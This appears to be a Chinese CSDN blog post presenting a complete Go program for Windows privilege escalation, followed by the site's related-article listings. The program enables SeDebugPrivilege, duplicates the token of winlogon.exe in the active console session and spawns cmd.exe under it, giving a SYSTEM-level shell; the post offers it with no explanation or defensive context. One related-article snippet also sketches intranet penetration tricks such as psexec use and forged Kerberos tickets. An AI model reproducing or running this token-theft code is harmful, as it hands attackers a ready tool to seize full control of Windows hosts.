golang实现windows提权

已于 2024-04-16 16:21:53 修改
阅读量485 收藏 5
点赞数 3
文章标签: golang windows stm32
于 2024-04-15 13:52:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1309525802/article/details/137778377
版权

golang实现windows提权

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"github.com/shirou/gopsutil/process"
	"golang.org/x/sys/windows"
)

const (
	TOKEN_ALL_ACCESS     = 0x000F01FF
	SE_PRIVILEGE_ENABLED = 0x00000002
	TOKEN_DUPLICATE      = 0x00000002
)

var (
	modadvapi32             = syscall.NewLazyDLL("advapi32.dll")
	createProcessWithTokenW = modadvapi32.NewProc("CreateProcessWithTokenW")
)

func CreateProcessWithTokenW(Token windows.Token,
	LogonFlags uint32,
	ApplicationName *uint16,
	CommandLine *uint16,
	CreationFlags uint32,
	Environment **uint16,
	CurrentDirectory *uint16,
	StartupInfo *windows.StartupInfo,
	ProcessInformation *windows.ProcessInformation) bool {

	r0, _, _ := createProcessWithTokenW.Call(
		uintptr(Token),
		uintptr(LogonFlags),
		uintptr(unsafe.Pointer(ApplicationName)),
		uintptr(unsafe.Pointer(CommandLine)),
		uintptr(CreationFlags),
		uintptr(unsafe.Pointer(Environment)),
		uintptr(unsafe.Pointer(CurrentDirectory)),
		uintptr(unsafe.Pointer(StartupInfo)),
		uintptr(unsafe.Pointer(ProcessInformation)))

	return r0 != 0
}

func SetPrivilege() error {
	var hToken windows.Token
	err := windows.OpenProcessToken(windows.CurrentProcess(), TOKEN_ALL_ACCESS, &hToken)
	if err != nil {
		return err
	}
	defer hToken.Close()
	var tp windows.Tokenprivileges
	tp.PrivilegeCount = 1
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED

	var luid windows.LUID
	se, _ := syscall.UTF16PtrFromString("SeDebugPrivilege")
	windows.LookupPrivilegeValue(nil, se, &luid)

	tp.Privileges[0].Luid = luid
	windows.AdjustTokenPrivileges(hToken, false, &tp, uint32(unsafe.Sizeof(windows.Tokenprivileges{})), nil, nil)

	return nil
}

func GetProcessIdByName(targetname string, sessionID uint32) uint32 {
	pids, _ := process.Processes()
	for _, p := range pids {
		name, _ := p.Name()
		if targetname == name {
			var sesID uint32 = 0
			windows.ProcessIdToSessionId(uint32(p.Pid), &sesID)
			if sesID == sessionID {
				return uint32(p.Pid)
			}
		}
	}
	return 0
}
func main() {
	err := SetPrivilege()
	if err != nil {
		fmt.Println("Error:", err)
		return
	}
	// CMD := "cmd.exe"
	targetProcess := "winlogon.exe"
	sessionID := windows.WTSGetActiveConsoleSessionId()
	if sessionID != 0xffffff {
		processId := GetProcessIdByName(targetProcess, sessionID)
		if processId != 0 {
			targetProcessHandle, _ := windows.OpenProcess(0x400, false, processId)
			defer windows.CloseHandle(targetProcessHandle)
			var targetProcessToken windows.Token
			defer targetProcessToken.Close()
			err := windows.OpenProcessToken(targetProcessHandle, TOKEN_DUPLICATE, &targetProcessToken)
			if err != nil {
				fmt.Println("windows.OpenProcessTok", err)
				return
			}
			var impersonationToken windows.Token
			defer impersonationToken.Close()
			err = windows.DuplicateTokenEx(targetProcessToken, TOKEN_ALL_ACCESS, nil, windows.SecurityIdentification, windows.TokenPrimary, &impersonationToken)
			if err != nil {
				fmt.Println("DuplicateTokenEx", err)
				return
			}
			var si windows.StartupInfo
			var pi windows.ProcessInformation
			si.Cb = uint32(unsafe.Sizeof(si))
			Desktop, _ := syscall.UTF16PtrFromString("winsta0\\default")
			si.Desktop = Desktop
			CMDStr, _ := windows.UTF16PtrFromString("cmd.exe")
			status := CreateProcessWithTokenW(impersonationToken, 0, CMDStr, nil, windows.CREATE_NEW_CONSOLE, nil, nil, &si, &pi)
			if !status {
				err = windows.CreateProcessAsUser(impersonationToken, nil, CMDStr, nil, nil, false, 0, nil, nil, &si, &pi)
				if err != nil {
					fmt.Println("CreateProcessAsUser", err)
					return
				}
			}
		}
	}
}
山与路
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Golangwindows下使用当前用户身份调用其他程序
focus on security
10-15 2572
GolangWindows下以系统服务运行时其运行身份是SYSTEM,此时使用exec包启动其他程序时,默认也会是SYSTEM身份,而由于windows的隔离机制,启动的程序是不会显示界面的。故在此情况下不能使用exec包,需要调用windows api使用当前用户身份打开其他程序。 通过调用CreateProcessAsUserW这个api可以用其他用户身份创建进程,所以我们可以通过获取当前用户的Token并用它来调用这个API。 Golang中的实现已有相关代码在https://gist.githu
如何用golang快速开发一个带UI的进程的守护后台服务程序
superxxd的专栏
02-18 918
如何用golang快速开发一个带UI的进程的守护后台服务程序 最近应用要做客户端界面,通过mqtt协议指令实现界面的功能自动化,由于使用场景需要采用托盘和无人值守的模式,需要实现开机自启动,并且在使用过程中发现程序退出后要自动恢复运行。以前用c实现的代码在底层编程时还是比较方便,我最近迷上了用golang写程序,如何让golang也能方便的实现界面和强大的底层编程能力呢,当然这里不是嵌入式开发,主要是针对windows平台,通过大量的baidu,google,看了很多高手的代码,发现也就是g...
golang大厂面试2
niwoxiangyu的博客
07-04 1160
一开始一个项目数据比较多,后来需要分库分表,有什么思路在不停服务的情况下做到平滑切换?wss是基于tcp的,tcp有个半连接队列,有没有遇到发了信令但是服务器没收到的情况?实现一个函数,有两个参数分别是升序的整数数组a和b,返回合并后的升序整数数组。理解不理解这些树的构造,是要解决什么问题?处理日志的时候如果发现突然量变大,该如何扩容让以前堆积的日志可以消耗掉?命令的时间差如何保证,命令混乱了怎么办(时间戳记录在服务器可以吗?题拍拍主要做拍搜服务的,题拍拍主要做增长,后面会做微服务架构k8s等。
GoLang之协程是怎样的存在
qq_53267860的博客
09-20 844
每个协程拥有自己的执行栈,可以保存自己的执行现场,所以可以由用户程序按需创建携程,携程主动让出执行权时,会保存执行现场,然后切换到其他协程。协程恢复执行时,会根据之前保存的执行现场,恢复到中断前的状态继续执行。让多线程模型下,内核(态)用户(态)两头忙,却依然疲于应对,协程这种灵活轻量的用户太调度模型便受到了广泛的关注,而真正让协程大放异彩的,是他在io多路复用中的应用。线程可以选择一个执行体来执行,此时cpu中指令指针就会指向这个执行体的执行入口,栈基和栈指针寄存器也会指向线程给他分配的执行栈。
golang 面试题(从基础到高级)
热门推荐
Bel_Ami_n的博客
03-08 1万+
Golang面试问题汇总: 1.Golang中除了加Mutex锁以外还有哪些方式安全读写共享变量? Golang中Goroutine 可以通过 Channel 进行安全读写共享变量。 2.无缓冲 Chan 的发送和接收是否同步? ch := make(chan int)     无缓冲的channel由于没有缓冲发送和接收需要同步。 ch := make(chan int, 2) 有缓冲channel不要求发送和接收操作同步。 channel无缓冲时,发送阻塞直到数据被接收
Windows MiniHook HookAPIDemo
HeroRazor的专栏
09-14 448
// InjectTestDlg.cpp : 实现文件 // #include "stdafx.h" #include "InjectTest.h" #include "InjectTestDlg.h" #include "afxdialogex.h" #include "UUBaseDefine.h" #include <shlwapi.h> #include <Tlhelp32.h> #ifdef _DEBUG #define new DEBUG_NEW #endif ..
肝!IO编程模型底层原理到net库不得不选择多路复用的原因剖析(golang
weixin_39915192的博客
05-23 290
​1.IO模型通读 IO模型参考来自「Richard Stevens」的UNIX Network Programming The Sockets Networking API Volume 1 • Third Edition blocking I/O nonblocking I/O I/O multiplexing (select and poll) signal driven I/O (SIGIO) asynchronous I/O (the POSIX..
内网渗透TIPS总结,2024年最新Golang开发实战
2401_84253182的博客
04-19 737
中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交。在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务,命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会。机上创建一个psexec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过psexec 服务运行命令,运行结束后删除服务。
GoLang之[协程第一话]协程是怎样的存在
weixin_52690231的博客
06-14 890
GoLang之[协程第一话]协程是怎样的存在
Golang 1.18.10 Windows安装包
07-14
Golang 1.18.10 Windows安装包。Golang 1.18.10 Windows安装包。Golang 1.18.10 Windows安装包。Golang 1.18.10 Windows安装包。Golang 1.18.10 Windows安装包。Golang 1.18.10 Windows安装包。Golang 1.18.10 ...
go golang 1.19.2 windows 安装包
10-19
go golang 1.19.2 windows 安装包
Golang 获取wmi windows硬件信息
02-12
这是一个Golang 获取wmi windows硬件信息的源代码,包括CPU,网卡,内存,硬盘等信息
循环鼠标自动点击功能- Golang实现
04-10
循环鼠标自动点击功能--- Golang实现 有代码和可执行程序。
win-netstat:Golang中的Windows netstat实现
05-02
win-netstat Golang中的Windows netstat实现。入门package mainimport ("fmt""log""github.com/pytimer/win-netstat")func tcp4 () {conns , err := winnetstat . Connections ( "tcp4" )if err != nil {log . Fatal...
如何学习Golang语言!
FengyangCoder的博客
06-09 408
起源与设计哲学:Go语言由Robert Griesemer、Rob Pike和Ken Thompson三位Google工程师设计,旨在解决现代编程中的一些常见问题,如编译速度、运行效率和并发编程。主要特点:Go语言的语法简单、编译速度快、运行效率高,支持静态类型和内存安全,具有垃圾回收功能,并且原生支持并发编程。
golang函数
zhanglong_longlong的专栏
06-12 322
对特定的功能进行提取,形成一个代码片段,这个代码片段就是我们所说的函数。【3】函数和函数是并列的关系,所以我们定义的函数不能写到main函数中。遵循标识符命名规范:见名知意 addNum,驼峰命名addNum。首字母大写该函数可以被本包文件和其它包文件使用(类似public)形参列表:个数:可以是一个参数,可以是n个参数,可以是0个参数。func 函数名(形参列表)(返回值类型列表){【2】函数的作用:提高代码的复用性。形式参数列表:作用:接收外来的数据。实际参数:实际传入的数据。
Golang:依赖注入与wire
最新发布
Leroy的博客
06-15 1112
依赖注入(dependency injection,缩写DI)是一种软件设计模型,用于实现类之间的解耦和依赖关系的管理。它通过将依赖关系的创建和维护责任转移到外部容器中,使得类不需要自己实例化依赖对象,而是由外部容器动态地注入依赖。依赖注入的实现方式包括构造函数注入、属性注入、接口注入等,每种方式都有其特定的用途和优势。修改后代码,我们把db的初始化放到了NewService的外面,在调用NewService的时候将其通过传参的方式传递过来。在Golang只使用依赖注入的核心目的,其实就是为了解耦代码。
11.2 Go 常用包介绍
专注于全栈开发领域
06-13 646
Go 语言的包非常强大,它们提供了构建高效、可靠应用程序所需的一切。通过深入理解并掌握这些包的使用技巧,开发者可以更加得心应手地解决各种编程问题。希望本文能够帮助开发者更深入地了解 Go 语言的常用包,并在实际开发中运用这些技巧。
golang实现windows文件监控
06-08
可以使用Golang的标准库中的`os`和`filepath`包来实现Windows文件监控。具体步骤如下: 1. 使用`os.Stat()`函数获取待监控文件的信息,包括文件名、路径、大小、修改时间等。 2. 使用`os.Open()`函数打开待监控文件。 3. 使用`os.File`对象的`Stat()`函数获取文件的当前信息,包括大小和修改时间。 4. 使用`os.File`对象的`Seek()`函数将文件指针移到文件末尾。 5. 使用`os.File`对象的`Read()`函数读取文件末尾的数据,如果读到数据,则表示文件有更新。 6. 如果文件有更新,则可以执行相应的操作,如打印文件更新信息等。 下面是一个简单的示例代码: ``` package main import ( "fmt" "os" "path/filepath" "time" ) func main() { filename := "test.txt" path, err := filepath.Abs(filename) if err != nil { fmt.Println(err) return } fi, err := os.Stat(path) if err != nil { fmt.Println(err) return } for { time.Sleep(time.Second) // 每秒检查一次文件更新 currFi, err := os.Stat(path) if err != nil { fmt.Println(err) continue } if currFi.Size() != fi.Size() || currFi.ModTime() != fi.ModTime() { fi = currFi fmt.Printf("File %s has been updated!\n", filename) // 可以在这里执行相应的操作 } } } ``` 在上面的示例中,程序会每秒检查一次文件是否有更新,如果文件有更新,则打印相应的信息。在实际应用中,可以根据具体需求执行相应的操作,如发送邮件、上传文件等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值